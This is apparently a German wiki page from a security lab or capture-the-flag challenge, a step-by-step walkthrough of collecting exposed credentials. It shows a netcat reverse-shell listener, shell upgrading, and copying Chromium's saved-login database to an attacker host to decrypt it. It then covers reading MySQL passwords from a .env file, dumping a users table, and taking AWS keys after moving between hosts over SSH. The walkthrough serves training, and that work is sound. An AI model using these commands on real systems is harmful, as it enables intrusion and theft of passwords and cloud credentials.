Benutzer-Werkzeuge

Webseiten-Werkzeuge


security:challenge:exposed_creds

Find Garry's Password

Start Reverse Shell Listener

root@kali$
nc -l 8000

Enhance Shell

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method-3-upgrading-from-netcat-with-magic

garry@desktop$
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
        echo $TERM
        stty -a
        stty raw -echo
fg
reset
--> xterm

Enable ssh and exfiltrate

garry@desktop$
ssh-keygen
-->copy/paste id_rsa.pub -> root@kali
scp .config/chromium/Default/Login\ Data root@10.5.4.3:/tmp

Get Chrome Password

root@kali$
apt-get install python3-pip
sudo pip install pycrypto
apt-get install sqlite3
cd /tmp
      #sqlite3 Login\ Data 'select username_value, password_value from logins;'
./get_chrome_pass.py
   Decrypting the string: b'v...'                              
   b...e

ssh to intern Server

garry@desktop$
ssh 192.168.6.105

Find Bob's Password

garry@server-intern$
python -c 'import pty; pty.spawn("/bin/bash")'

cat /var/www/app/.env
MYSQL_ROOT_PASSWORD=t..r
MYSQL_USER=d..r
MYSQL_PASSWORD=xxx
MYSQL_DATABASE=xxx

cat /var/www/app/www/conf.php 
<?php
        $conf = [
                'host'=>'localhost',
                'user'=>getenv('MYSQL_USER'),
                'password'=>getenv('MYSQL_PASSWORD'),
                'dbname'=>'intern',
                'port'=>3306,
                'charset'=>'utf8'
        ];
?>

cat /var/www/app/www/login.php

 // Prepare a select statement
        $sql = "SELECT id, username, password FROM users WHERE username = ?";
        
        
mysql -h 192.168.6.105 -u root -p intern
-> t..r

mysql> select * from users;
+----+----------+----------------------------------+---------------------+
| id | username | password                         | created_at          |
+----+----------+----------------------------------+---------------------+
|  1 | bob      | xxx | 2021-06-26 10:35:43 |
|  2 | garry    | xxx | 2021-06-26 10:35:43 |
+----+----------+----------------------------------+---------------------+

google for hash
--> b..7

Find AWS Keys

garry@server-intern$
ssh bob@192.168.6.22

cat /home/bob/.aws/credentials
[default]
aws_access_key_id = xxx
aws_secret_access_key = xxx
security/challenge/exposed_creds.txt · Zuletzt geändert: von wikiadm

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki